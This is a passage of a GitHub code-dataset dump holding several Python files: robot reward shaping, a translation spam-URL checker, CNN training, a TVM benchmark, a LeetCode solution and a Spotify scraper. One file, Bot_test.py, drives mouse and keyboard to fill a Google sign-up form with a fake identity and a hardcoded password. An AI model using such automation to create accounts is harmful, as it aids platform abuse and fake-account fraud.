change_in_abs_target_delta_yaw : float, \n target_custom_data: Optional[Any],\n enable_target_custom_obs : bool,\n info_dict: dict[str,Any],\n randomState: np.random.RandomState\n ) -> None:\n roll_w = stand_w = 0.5\n roll_threshold = np.cos(0.2 * np.pi)\n\n r_roll, root_cos_dist = self._calc_reward_roll(Robot)\n r_stand, r_height, r_pose, r_vel = self._calc_reward_stand(Robot)\n\n info_dict[\"reward_roll\"] = r_roll\n info_dict[\"reward_height\"] = r_height\n info_dict[\"reward_pose\"] = r_pose\n info_dict[\"reward_qvel\"] = r_vel\n info_dict[\"cos_dist\"] = root_cos_dist\n\n if root_cos_dist > roll_threshold:\n r_stand = r_stand\n else:\n r_stand = 0.0\n\n info_dict[\"reward_stand\"] = r_stand\n\n reward = roll_w * r_roll + stand_w * r_stand\n standing_reward = reward\n\n # Calculate Energy / Qvel Penalty\n qvel = Robot.get_joint_qvel()\n torque = Robot.get_joint_torques()\n energy = np.sum(np.abs(qvel * torque))\n info_dict[\"energy\"] = energy\n \n if self.use_energy_penalty:\n energy_reward = - 0.02 * energy\n else:\n energy_reward = 0.0\n \n self._log_success_rate(\n info_dict,\n r_roll,\n r_height,\n r_pose\n )\n\n self.rew = standing_reward + energy_reward\n\n\nclass GatedResetRewardProvider(ResetRewardProvider):\n def step_reward(\n self, \n Robot: RailSimWalkerDMControl,\n action_target_qpos: np.ndarray, \n target_goal_world_delta: np.ndarray,\n target_goal_local: np.ndarray,\n target_yaw : float,\n target_delta_yaw: float, \n target_velocity: float,\n velocity_to_goal: float, \n change_in_abs_target_delta_yaw : float, \n target_custom_data: Optional[Any],\n enable_target_custom_obs : bool,\n info_dict: dict[str,Any],\n randomState: np.random.RandomState\n ) -> None:\n\n r_roll, root_cos_dist = self._calc_reward_roll(Robot)\n info_dict[\"reward_roll\"] = r_roll\n info_dict[\"cos_dist\"] = root_cos_dist\n\n r_stand, r_height, r_pose, r_vel = self._calc_reward_stand(Robot)\n\n info_dict[\"reward_roll\"] = r_roll\n info_dict[\"reward_height\"] = r_height\n info_dict[\"reward_pose\"] = r_pose\n info_dict[\"reward_qvel\"] = r_vel\n info_dict[\"cos_dist\"] = root_cos_dist\n\n # Calculate Energy / Qvel Penalty\n qvel = Robot.get_joint_qvel()\n torque = Robot.get_joint_torques()\n energy = np.sum(np.abs(qvel * torque))\n info_dict[\"energy\"] = energy\n \n if self.use_energy_penalty:\n energy_reward = - 0.02 * energy\n else:\n energy_reward = 0.0\n\n self._log_success_rate(\n info_dict,\n r_roll,\n r_height,\n r_pose\n )\n\n self.rew = (r_roll * (1 + r_stand) + energy_reward) / 2.0\n","repo_name":"realquantumcookie/APRL","sub_path":"rail_walker_gym/joystick_policy_mujoco/reward_providers_sim.py","file_name":"reward_providers_sim.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"31"} +{"seq_id":"19513236464","text":"import sys, os, re, multiprocessing\n\nfrom i18n_helper import l10nFolderName, projectRootDirectory\nfrom i18n_helper.catalog import Catalog\nfrom i18n_helper.globber import getCatalogs\n\nVERBOSE = 0\n\n\nclass MessageChecker:\n \"\"\"Checks all messages in a catalog against a regex.\"\"\"\n def __init__(self, human_name, regex):\n self.regex = re.compile(regex, re.IGNORECASE)\n self.human_name = human_name\n\n def check(self, inputFilePath, templateMessage, translatedCatalogs):\n patterns = set(self.regex.findall(\n templateMessage.id[0] if templateMessage.pluralizable else templateMessage.id\n ))\n\n # As a sanity check, verify that the template message is coherent.\n # Note that these tend to be false positives.\n # TODO: the pssible tags are usually comments, we ought be able to find them.\n if templateMessage.pluralizable:\n pluralUrls = set(self.regex.findall(templateMessage.id[1]))\n if pluralUrls.difference(patterns):\n print(f\"{inputFilePath} - Different {self.human_name} in singular and plural source strings \"\n f\"for '{templateMessage}' in '{inputFilePath}'\")\n\n for translationCatalog in translatedCatalogs:\n translationMessage = translationCatalog.get(\n templateMessage.id, templateMessage.context)\n if not translationMessage:\n continue\n\n translatedPatterns = set(self.regex.findall(\n translationMessage.string[0] if translationMessage.pluralizable else translationMessage.string\n ))\n unknown_patterns = translatedPatterns.difference(patterns)\n if unknown_patterns:\n print(f'{inputFilePath} - {translationCatalog.locale}: '\n f'Found unknown {self.human_name} {\", \".join([\"`\" + x + \"`\" for x in unknown_patterns])} in the translation '\n f'which do not match any of the URLs in the template: {\", \".join([\"`\" + x + \"`\" for x in patterns])}')\n\n if templateMessage.pluralizable and translationMessage.pluralizable:\n for indx, val in enumerate(translationMessage.string):\n if indx == 0:\n continue\n translatedPatternsMulti = set(self.regex.findall(val))\n unknown_patterns_multi = translatedPatternsMulti.difference(pluralUrls)\n if unknown_patterns_multi:\n print(f'{inputFilePath} - {translationCatalog.locale}: '\n f'Found unknown {self.human_name} {\", \".join([\"`\" + x + \"`\" for x in unknown_patterns_multi])} in the pluralised translation '\n f'which do not match any of the URLs in the template: {\", \".join([\"`\" + x + \"`\" for x in pluralUrls])}')\n\ndef check_translations(inputFilePath):\n if VERBOSE:\n print(f\"Checking {inputFilePath}\")\n templateCatalog = Catalog.readFrom(inputFilePath)\n\n # If language codes were specified on the command line, filter by those.\n filters = sys.argv[1:]\n\n # Load existing translation catalogs.\n existingTranslationCatalogs = getCatalogs(inputFilePath, filters)\n\n spam = MessageChecker(\"url\", r\"https?://(?:[a-z0-9-_$@./&+]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\")\n sprintf = MessageChecker(\"sprintf\", r\"%\\([^)]+\\)s\")\n tags = MessageChecker(\"tag\", r\"[^\\\\][^\\\\](\\[[^]]+/?\\])\")\n\n # Check that there are no spam URLs.\n # Loop through all messages in the .POT catalog for URLs.\n # For each, check for the corresponding key in the .PO catalogs.\n # If found, check that URLS in the .PO keys are the same as those in the .POT key.\n for templateMessage in templateCatalog:\n spam.check(inputFilePath, templateMessage, existingTranslationCatalogs)\n sprintf.check(inputFilePath, templateMessage, existingTranslationCatalogs)\n tags.check(inputFilePath, templateMessage, existingTranslationCatalogs)\n\n if VERBOSE:\n print(f\"Done checking {inputFilePath}\")\n\n\ndef main():\n print(\"\\n\\tWARNING: Remember to regenerate the POT files with “updateTemplates.py” \"\n \"before you run this script.\\n\\tPOT files are not in the repository.\\n\")\n foundPots = 0\n for root, folders, filenames in os.walk(projectRootDirectory):\n for filename in filenames:\n if len(filename) > 4 and filename[-4:] == \".pot\" and os.path.basename(root) == l10nFolderName:\n foundPots += 1\n multiprocessing.Process(\n target=check_translations,\n args=(os.path.join(root, filename), )\n ).start()\n if foundPots == 0:\n print(\n \"This script did not work because no '.pot' files were found. \"\n \"Please run 'updateTemplates.py' to generate the '.pot' files, \"\n \"and run 'pullTranslations.py' to pull the latest translations from Transifex. \"\n \"Then you can run this script to check for spam in translations.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0ad/0ad","sub_path":"source/tools/i18n/checkTranslations.py","file_name":"checkTranslations.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":2526,"dataset":"github-code","pt":"31"} +{"seq_id":"33119181059","text":"from model import CNN\nimport utils\nimport os\n\nfrom torch.autograd import Variable\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\n\ntb_writer = SummaryWriter(log_dir=\"logs\")\n\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom gensim.models.keyedvectors import KeyedVectors\nimport numpy as np\nimport argparse\nimport copy\n\n\ndef train(data, params, global_step):\n if params[\"MODEL\"] != \"rand\":\n # load word2vec\n print(\"loading word2vec...\")\n if os.path.exists(\"glove.txt\"):\n print(\"load glove.txt\")\n word_vectors = KeyedVectors.load_word2vec_format(\"glove.txt\")\n else:\n word_vectors = KeyedVectors.load_word2vec_format(params[\"W2V_PATH\"])\n\n words = {}\n w_in_w2v = 0\n wv_matrix = []\n for i in range(len(data[\"vocab\"])):\n word = data[\"idx_to_word\"][i]\n if word in word_vectors.vocab:\n wv_matrix.append(word_vectors.word_vec(word))\n words[word] = word_vectors.word_vec(word)\n w_in_w2v += 1\n else:\n wv_matrix.append(np.random.uniform(-0.01, 0.01, 300).astype(\"float32\"))\n\n # vocab_num:13802, in w2v: 6506, ratio:0.4713809592812636\n print(\"vocab_num:{}, in w2v: {}, ratio:{}\".format(len(data[\"vocab\"]), w_in_w2v,\n float(w_in_w2v) / len(data[\"vocab\"])))\n\n if not os.path.exists(\"glove.txt\"):\n print(\"write glove vector to glove.txt\")\n with open(\"glove.txt\", \"w\", encoding=\"utf-8\") as f:\n f.write(str(len(words)) + \" 300\\n\")\n for word in words:\n f.write(\"{} {}\\n\".format(word, \" \".join(\"%s\" % v for v in words[word])))\n\n # one for UNK and one for zero padding\n wv_matrix.append(np.random.uniform(-0.01, 0.01, 300).astype(\"float32\"))\n wv_matrix.append(np.zeros(300).astype(\"float32\"))\n wv_matrix = np.array(wv_matrix)\n params[\"WV_MATRIX\"] = wv_matrix\n\n model = CNN(**params).cuda(params[\"GPU\"])\n\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n optimizer = optim.Adadelta(parameters, params[\"LEARNING_RATE\"])\n criterion = nn.CrossEntropyLoss()\n\n max_dev_res = {\"weighted_f1\": 0}\n max_test_res = {}\n max_train_res = {}\n max_epoch = 0\n best_cnt = 0\n for e in range(params[\"EPOCH\"]):\n data[\"train_x\"], data[\"train_y\"] = shuffle(data[\"train_x\"], data[\"train_y\"])\n\n for i in range(0, len(data[\"train_x\"]), params[\"BATCH_SIZE\"]):\n global_step += 1\n batch_range = min(params[\"BATCH_SIZE\"], len(data[\"train_x\"]) - i)\n\n batch_x = [[data[\"word_to_idx\"][w] for w in sent] +\n [params[\"VOCAB_SIZE\"] + 1] * (params[\"MAX_SENT_LEN\"] - len(sent))\n for sent in data[\"train_x\"][i:i + batch_range]]\n batch_y = [data[\"classes\"].index(c) for c in data[\"train_y\"][i:i + batch_range]]\n\n batch_x = Variable(torch.LongTensor(batch_x)).cuda(params[\"GPU\"])\n batch_y = Variable(torch.LongTensor(batch_y)).cuda(params[\"GPU\"])\n\n optimizer.zero_grad()\n model.train()\n pred = model(batch_x)\n loss = criterion(pred, batch_y)\n loss.backward()\n nn.utils.clip_grad_norm(parameters, max_norm=params[\"NORM_LIMIT\"])\n optimizer.step()\n print(\"global_step: %d, epoch: %d, loss: %f\" % (global_step, e + 1, loss.item()))\n tb_writer.add_scalar('loss', loss.item(), global_step)\n\n print(\"epoch:\", e + 1)\n train_res = test(data, model, params, \"train\", global_step)\n dev_res = test(data, model, params, \"dev\", global_step)\n test_res = test(data, model, params, \"test\", global_step)\n # print(\"epoch:\", e + 1, \"/ train_res:\", train_res, \"/ dev_res:\", dev_res, \"/ test_res:\", test_res)\n\n if dev_res[\"weighted_f1\"] > max_dev_res[\"weighted_f1\"]:\n max_train_res = train_res\n max_dev_res = dev_res\n max_test_res = test_res\n max_epoch = e + 1\n print(\"New best model!\")\n if params[\"SAVE_MODEL\"]:\n best_model = copy.deepcopy(model)\n\n if params[\"EARLY_STOPPING\"] and dev_res[\"weighted_f1\"] <= max_dev_res[\"weighted_f1\"]:\n best_cnt += 1\n if best_cnt >= 3:\n print(\"early stopping by dev_weighted_f1!\")\n break\n else:\n best_cnt = 0\n\n print(\"BEST MODEL epoch: \" + str(max_epoch))\n print(\"train\\t\" + \" \".join([\"%s: %.4f\" % (k, max_train_res[k]) for k in max_train_res]))\n print(\"dev\\t\" + \" \".join([\"%s: %.4f\" % (k, max_dev_res[k]) for k in max_dev_res]))\n print(\"test\\t\" + \" \".join([\"%s: %.4f\" % (k, max_test_res[k]) for k in max_test_res]))\n if params[\"SAVE_MODEL\"]:\n utils.save_model(best_model, params)\n return global_step, max_train_res, max_dev_res, max_test_res, max_epoch\n\n\ndef test(data, model, params, mode, global_step):\n model.eval()\n\n if mode == \"dev\":\n x, y = data[\"dev_x\"], data[\"dev_y\"]\n elif mode == \"test\":\n x, y = data[\"test_x\"], data[\"test_y\"]\n elif mode == \"train\":\n x, y = data[\"train_x\"], data[\"train_y\"]\n\n x = [[data[\"word_to_idx\"][w] if w in data[\"vocab\"] else params[\"VOCAB_SIZE\"] for w in sent] +\n [params[\"VOCAB_SIZE\"] + 1] * (params[\"MAX_SENT_LEN\"] - len(sent))\n for sent in x]\n\n x = Variable(torch.LongTensor(x)).cuda(params[\"GPU\"])\n y = [data[\"classes\"].index(c) for c in y]\n\n pred = np.argmax(model(x).cpu().data.numpy(), axis=1)\n # acc = sum([1 if p == y else 0 for p, y in zip(pred, y)]) / len(pred)\n res = {}\n res[\"acc\"] = accuracy_score(y, pred)\n res[\"macro_p\"] = precision_score(y, pred, average=\"macro\")\n res[\"macro_r\"] = recall_score(y, pred, average=\"macro\")\n res[\"macro_f1\"] = f1_score(y, pred, average=\"macro\")\n res[\"micro_p\"] = precision_score(y, pred, average=\"micro\")\n res[\"micro_r\"] = recall_score(y, pred, average=\"micro\")\n res[\"micro_f1\"] = f1_score(y, pred, average=\"micro\")\n res[\"weighted_f1\"] = f1_score(y, pred, average=\"weighted\")\n print(\n \"{}\\tacc: {:.4f}\\tmacro: p {:.4f}, r {:.4f}, f1: {:.4f}\\tmicro: p {:.4f}, r {:.4f}, f1 {:.4f}\\tweighted_f1:{:.4f}\".format(\n mode, res[\"acc\"], res[\"macro_p\"], res[\"macro_r\"], res[\"macro_f1\"], res[\"micro_p\"], res[\"micro_r\"],\n res[\"micro_f1\"], res[\"weighted_f1\"]))\n for k in res:\n tb_writer.add_scalar(mode + \"_\" + k, res[k], global_step)\n return res\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"-----[CNN-classifier]-----\")\n parser.add_argument(\"--mode\", default=\"train\", help=\"train: train (with test) a model / test: test saved models\")\n parser.add_argument(\"--model\", default=\"non-static\",\n help=\"available models: rand, static, non-static, multichannel\")\n parser.add_argument(\"--dataset\", default=\"MELD\", help=\"available datasets: MR, TREC, MELD\")\n parser.add_argument(\"--save_model\", default=False, action='store_true', help=\"whether saving model or not\")\n parser.add_argument(\"--early_stopping\", default=False, action='store_true', help=\"whether to apply early stopping\")\n parser.add_argument(\"--epoch\", default=200, type=int, help=\"number of max epoch\")\n parser.add_argument(\"--learning_rate\", default=0.1, type=float, help=\"learning rate\")\n parser.add_argument(\"--gpu\", default=9, type=int, help=\"the number of gpu to be used\")\n parser.add_argument(\"--w2v_path\", default=\"/users5/yjtian/Downloads/glove.840B.300d.w2v.txt\",\n help=\"word2vec file path\")\n\n options = parser.parse_args()\n data = getattr(utils, f\"read_{options.dataset}\")()\n\n data[\"vocab\"] = sorted(list(set([w for sent in data[\"train_x\"] + data[\"dev_x\"] + data[\"test_x\"] for w in sent])))\n data[\"classes\"] = sorted(list(set(data[\"train_y\"])))\n data[\"word_to_idx\"] = {w: i for i, w in enumerate(data[\"vocab\"])}\n data[\"idx_to_word\"] = {i: w for i, w in enumerate(data[\"vocab\"])}\n\n params = {\n \"MODEL\": options.model,\n \"DATASET\": options.dataset,\n \"SAVE_MODEL\": options.save_model,\n \"EARLY_STOPPING\": options.early_stopping,\n \"EPOCH\": options.epoch,\n \"LEARNING_RATE\": options.learning_rate,\n \"MAX_SENT_LEN\": max([len(sent) for sent in data[\"train_x\"] + data[\"dev_x\"] + data[\"test_x\"]]),\n \"BATCH_SIZE\": 256,\n \"WORD_DIM\": 300,\n \"VOCAB_SIZE\": len(data[\"vocab\"]),\n \"CLASS_SIZE\": len(data[\"classes\"]),\n \"FILTERS\": [3, 4, 5],\n \"FILTER_NUM\": [50, 50, 50],\n \"DROPOUT_PROB\": 0.5,\n \"NORM_LIMIT\": 3,\n \"GPU\": options.gpu,\n \"W2V_PATH\": options.w2v_path\n }\n\n print(\"=\" * 20 + \"INFORMATION\" + \"=\" * 20)\n print(\"MODEL:\", params[\"MODEL\"])\n print(\"DATASET:\", params[\"DATASET\"])\n print(\"VOCAB_SIZE:\", params[\"VOCAB_SIZE\"])\n print(\"EPOCH:\", params[\"EPOCH\"])\n print(\"LEARNING_RATE:\", params[\"LEARNING_RATE\"])\n print(\"EARLY_STOPPING:\", params[\"EARLY_STOPPING\"])\n print(\"SAVE_MODEL:\", params[\"SAVE_MODEL\"])\n print(\"MAX_SENT_LEN:\", params[\"MAX_SENT_LEN\"])\n print(\"CLASS_SIZE:\", params[\"CLASS_SIZE\"])\n print(\"FILTERS:\", params[\"FILTERS\"])\n print(\"FILTER_NUM:\", params[\"FILTER_NUM\"])\n print(\"=\" * 20 + \"INFORMATION\" + \"=\" * 20)\n\n if options.mode == \"train\":\n print(\"=\" * 20 + \"TRAINING STARTED\" + \"=\" * 20)\n v = [\"acc\", \"macro_f1\", \"micro_f1\", \"weighted_f1\"]\n iter = 5\n test_w_f1 = 0.0\n best_epoch = []\n global_step = 0\n with open(\"res.csv\", \"w\", encoding=\"utf-8\") as f:\n f.write(\"id,\" + \",\".join(\n [\"train_%s\" % s for s in v] + [\"dev_%s\" % s for s in v] + [\"test_%s\" % s for s in v]) + \"\\n\")\n # f.write(\"id,acc,macro_f1,micro_f1,weighted_f1\\n\")\n for i in range(1, 1 + iter):\n print(\"=\" * 10 + \"ROUND \" + str(i) + \"=\" * 10)\n global_step, max_train_res, max_dev_res, max_test_res, max_epoch = train(data, params, global_step)\n test_w_f1 += max_test_res[\"weighted_f1\"]\n best_epoch.append(max_epoch)\n f.write(str(i) + \",\" + \",\".join([\"%f\" % max_train_res[k] for k in max_train_res if k in v]))\n f.write(\",\" + \",\".join([\"%f\" % max_dev_res[k] for k in max_dev_res if k in v]))\n f.write(\",\" + \",\".join([\"%f\" % max_test_res[k] for k in max_test_res if k in v]) + \"\\n\")\n # f.write(str(i) + \",\" + \",\".join([\"%f\" % max_test_res[k] for k in max_test_res if k in v]) + \"\\n\")\n print(\"=\" * 20 + \"TRAINING FINISHED\" + \"=\" * 20)\n test_w_f1 = test_w_f1 / iter\n print(\"best epoch: %s, avg test weighted f1: %f\" % (str(best_epoch), test_w_f1))\n tb_writer.add_scalar('avg_test_w_f1', test_w_f1, global_step)\n tb_writer.close()\n else:\n model = utils.load_model(params).cuda(params[\"GPU\"])\n\n test_acc = test(data, model, params)\n print(\"test acc:\", test_acc)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tianyijian/CNN","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26209028525","text":"from pyautogui import *\nimport pyautogui\nimport time\nimport win32api, win32con\nfrom AppOpener import open\nfrom AppOpener import open\nimport random\n\nopen(\"Google Chrome\")\ntime.sleep(0.2)\n\n#!= 255 or pyautogui.pixel(17,1007) [0] != 201 or pyautogui.pixel(17,1007) [1] != 100 or pyautogui.pixel(17,1007) [2] != 89\n\nif pyautogui.pixel(1886,1000) [0] != 255 or pyautogui.pixel(1886,1000) [1] != 255 or pyautogui.pixel(1886,1000) [2]:\n\tpyautogui.keyDown('win')\n\tpyautogui.keyDown('up')\n\ttime.sleep(0.1)\n\tpyautogui.keyUp('win')\n\tpyautogui.keyUp('up')\n\tsleep(0.1)\n \ndef press(x,y):\n\twin32api.SetCursorPos((x,y))\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\n\ttime.sleep(0.1)\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\n\ttime.sleep(0.5)\n \ndef type(text):\n\tfor i in range(len(text)):\n\t\tpyautogui.keyDown(text[i])\n\t\ttime.sleep(0.01)\n\t\tpyautogui.keyUp(text[i])\n\ntype('https://support.google.com/accounts/answer/27441?hl=en')\n\npyautogui.keyDown('Enter')\npyautogui.keyUp('Enter')\ntime.sleep(2)\n\npress(250,580)\n\ntime.sleep(0.5)\ntype('Kalacskepu')\n\npress(1100,666)\n\ntime.sleep(0.1)\npress(820,540)\n\ntime.sleep(0.5)\ntype('1')\n\npress(930,540)\n\npress(930,570)\n\npress(1100,550)\n\ntype('2000')\n\npress(800,600)\n\npress(800,666)\n\npress(1100,700)\n\npress(780,610)\n\nwin32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\ntime.sleep(0.1)\nwin32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\n\ntype('Kalacskepu0001')\n\npress(970,725)\n\ntype('Jelszo01')\npyautogui.keyDown('Enter')\npyautogui.keyUp('Enter')\n\ntype('Jelszo01')\npyautogui.keyDown('Enter')\npyautogui.keyUp('Enter')\n\n\n","repo_name":"TucsokSk1lll/Python","sub_path":"Bot_test.py","file_name":"Bot_test.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73808665048","text":"import tvm\nfrom tvm import relay\nimport time\nimport numpy as np\nimport torch\nimport torchvision\n\ntorch.backends.cudnn.benchmark = True\n'''\n'AlexNet', 'DenseNet', 'GoogLeNet', 'GoogLeNetOutputs', \n'Inception3', 'InceptionOutputs', 'MNASNet', 'MobileNetV2', \n'MobileNetV3', 'ResNet', 'ShuffleNetV2', 'SqueezeNet', 'VGG', \n'_GoogLeNetOutputs', '_InceptionOutputs', '__builtins__', \n'__cached__', '__doc__', '__file__', '__loader__', '__name__', \n'__package__', '__path__', '__spec__', '_utils', 'alexnet', 'densenet', \n'densenet121', 'densenet161', 'densenet169', 'densenet201', 'detection', \n'googlenet', 'inception', 'inception_v3', 'mnasnet', 'mnasnet0_5', 'mnasnet0_75', \n'mnasnet1_0', 'mnasnet1_3', 'mobilenet', 'mobilenet_v2', 'mobilenet_v3_large',\n 'mobilenet_v3_small', 'mobilenetv2', 'mobilenetv3', 'quantization', 'resnet', \n 'resnet101', 'resnet152', 'resnet18', 'resnet34', 'resnet50', 'resnext101_32x8d',\n 'resnext50_32x4d', 'segmentation', 'shufflenet_v2_x0_5', 'shufflenet_v2_x1_0',\n 'shufflenet_v2_x1_5', 'shufflenet_v2_x2_0', 'shufflenetv2', 'squeezenet', 'squeezenet1_0', \n 'squeezenet1_1', 'utils', 'vgg', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',\n 'vgg19', 'vgg19_bn', 'video', 'wide_resnet101_2', 'wide_resnet50_2']\n'''\n\n# model_name = \"resnet18\"\nmodel_name = \"resnet18\"\nmodel = getattr(torchvision.models, model_name)(pretrained=False)\nmodel.half()\nmodel = model.eval()\n# We grab the TorchScripted model via tracing\ninput_shape = [1, 3, 224, 224]\ninput_data = torch.randn(input_shape).cuda()\nmodel = model.cuda()\nscripted_model = torch.jit.trace(model, input_data).eval()\n\n\n# warm-up\nfor i in range(50):\n output = model(input_data)\n\n\navg_fwd_time = 0\nfor i in range(50):\n torch.cuda.synchronize()\n start = time.time()\n output = model(input_data)\n torch.cuda.synchronize()\n end = time.time()\n fwd_time = end - start\n avg_fwd_time += fwd_time\navg_fwd_time = avg_fwd_time * 1000 / 50\nprint(\"time cost for torch-cudnn-fp32: %.5f\" % avg_fwd_time,\"ms\")\n\n\ninput_data = input_data.half()\nmodel = model.half()\nmodel.eval()\n\nfor i in range(50):\n output = model(input_data)\n\navg_fwd_time = 0\nfor i in range(50):\n torch.cuda.synchronize()\n start = time.time()\n output = model(input_data)\n torch.cuda.synchronize()\n end = time.time()\n fwd_time = end - start\n avg_fwd_time += fwd_time\navg_fwd_time = avg_fwd_time * 1000 / 50\nprint(\"time cost for torch-cudnn-fp16: %.5f\" % avg_fwd_time,\"ms\")\n\nimport pdb;pdb.set_trace()\n\nstart = time.time()\nfor i in range(100):\n output = scripted_model(input_data)\n # output = model(input_data)\n\n\nprint(\"time cost for pytorch jit:\", (time.time() - start) * 1000/100,\"ms\")\n\n# # import pdb;pdb.set_trace()\n# mod, params = relay.frontend.from_pytorch(scripted_model, [('input', input_shape)])\n\n# # target = tvm.target.Target(\"llvm\", host=\"llvm\")\n# dev = tvm.cuda(0)\n# with tvm.transform.PassContext(opt_level=3):\n# # lib = relay.build(mod, target=\"cuda -libs=cudnn\", params=params)\n# lib = relay.build(mod, target=\"cuda\", params=params)\n\n\n\n# from tvm.contrib import graph_executor\n# dtype = \"float32\"\n# m = graph_executor.GraphModule(lib[\"default\"](dev))\n# # Set inputs\n# data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n# m.set_input('input', tvm.nd.array(data_tvm))\n# # Execute\n# for i in range(50):\n# m.run()\n# start = time.time()\n# for i in range(10):\n# m.run()\n# end = time.time()\n# print(\"time cost for tvm-cudnn: \", (end - start) * 1000/10,\"ms\")\n# # Get outputs\n# tvm_output = m.get_output(0)\n\n\n\n","repo_name":"ybai62868/MixPrecisionTensorCore","sub_path":"tvm_cudnn/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70027601050","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n temp = head\n count=0\n while temp:\n temp=temp.next\n count+=1\n count//=2\n temp = head\n while count!=0:\n temp=temp.next\n count-=1\n return temp\n","repo_name":"chandansgowda/leetcode-python","sub_path":"501-1000/876.py","file_name":"876.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32551133838","text":"import os\nimport json\nimport requests\nimport numpy as np\nimport pandas as pd\nimport urllib.parse as urlparse\n\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom base64 import b64encode\nfrom urllib.parse import urlencode\nfrom loguru import logger\n\n\ndef get_token():\n data = {\n \"client_id\": os.getenv(\"client_id\"),\n \"client_secret\": os.getenv(\"client_secret\"),\n }\n encoded_credentials = b64encode(\n f\"{data['client_id']}:{data['client_secret']}\".encode(\"ascii\")\n ).decode(\"utf-8\")\n headers = {\"Authorization\": f\"Basic {encoded_credentials}\"}\n return json.loads(\n requests.post(\n \"https://accounts.spotify.com/api/token\",\n headers=headers,\n data={\"grant_type\": \"client_credentials\"},\n ).text\n )\n\n\ndef make_request(route, params={}, token=None):\n if not token:\n token = get_token()\n headers = {\"Authorization\": f\"{token['token_type']} {token['access_token']}\"}\n\n # adding query params\n url_parse = urlparse.urlparse(route)\n query_dict = dict(urlparse.parse_qsl(url_parse.query))\n query_dict.update(params)\n query_dict = urlparse.urlencode(query_dict)\n route = urlparse.urlunparse(url_parse._replace(query=query_dict))\n\n logger.debug(f\"Request {route}\")\n\n return requests.get(route, headers=headers)\n\n\ndef get_palylist(playlist_id, **kwargs):\n request_url = f\"https://api.spotify.com/v1/playlists/{playlist_id}/tracks\"\n response = json.loads(make_request(request_url, params=kwargs).text)\n results = response.get(\"items\", [])\n while response.get(\"next\"):\n response = json.loads(make_request(response.get(\"next\"), params={}).text)\n results.extend(response.get(\"items\", []))\n return results\n\n\ndef select_elements(record):\n return {\n \"user\": record.get(\"added_by\", {}).get(\"uri\"),\n \"track_name\": record.get(\"track\", {}).get(\"name\"),\n \"track_id\": record.get(\"track\", {}).get(\"id\"),\n \"artists\": list(\n map(\n lambda x: {\"name\": x[\"name\"], \"artist_id\": x[\"id\"]},\n record.get(\"track\", {}).get(\"artists\", []),\n )\n ),\n \"album_id\": record.get(\"track\", {}).get(\"album\", {}).get(\"id\"),\n \"album_name\": record.get(\"track\", {}).get(\"album\", {}).get(\"name\"),\n }\n\n\ndef get_track_info(track_id):\n request_url = f\"https://api.spotify.com/v1/tracks/{track_id}\"\n response = make_request(request_url)\n response = json.loads(response.text)\n return {\"popularity\": response.get(\"popularity\")}\n\n\ndef get_album_genre(album_id):\n request_url = f\"https://api.spotify.com/v1/albums/{album_id}\"\n response = make_request(request_url)\n response = json.loads(response.text)\n return response.get(\"genres\", [])\n\n\ndef get_genre_by_artist(row, **kwargs):\n genres = []\n if not isinstance(row, str):\n for artist in row.get(\"artists\", []):\n request_url = f\"https://api.spotify.com/v1/artists/{artist['artist_id']}\"\n genres.extend(\n json.loads(make_request(request_url, params=kwargs).text).get(\"genres\", [])\n )\n else:\n request_url = f\"https://api.spotify.com/v1/artists/{row}\"\n genres.extend(json.loads(make_request(request_url, params=kwargs).text).get(\"genres\", []))\n return list(set(genres))\n\n\ndef parallelize(data, func, num_of_processes=8):\n data_split = np.array_split(data, num_of_processes)\n pool = Pool(num_of_processes)\n data = pd.concat(pool.map(func, data_split))\n pool.close()\n pool.join()\n return data\n\n\ndef run_on_subset(func, data_subset):\n return data_subset.apply(func, axis=1)\n\n\ndef parallelize_on_rows(data, func, num_of_processes=8):\n return parallelize(data, partial(run_on_subset, func), num_of_processes)\n\n\nif __name__ == \"__main__\":\n playlist_tracks_raw = get_palylist(\"4ZMt8eMC3Vd1G40g527Msa\")\n playlist_tracks = list(map(select_elements, playlist_tracks_raw))\n\n df = pd.DataFrame(playlist_tracks)\n logger.info(f\"Collected {df.shape[0]} musics from this playlist\")\n\n logger.info(\"Getting genres\")\n df[\"genres\"] = parallelize_on_rows(df, get_genre_by_artist)\n df.to_json(\"playlist.json\", orient=\"records\")\n","repo_name":"PauloCarneiro99/Spotify-Sommelier","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72776490649","text":"import pandas as pd\nfrom validate_email import validate_email\n\nvalid_emails = pd.DataFrame()\n\n\ndef row_id_validator(document): # this 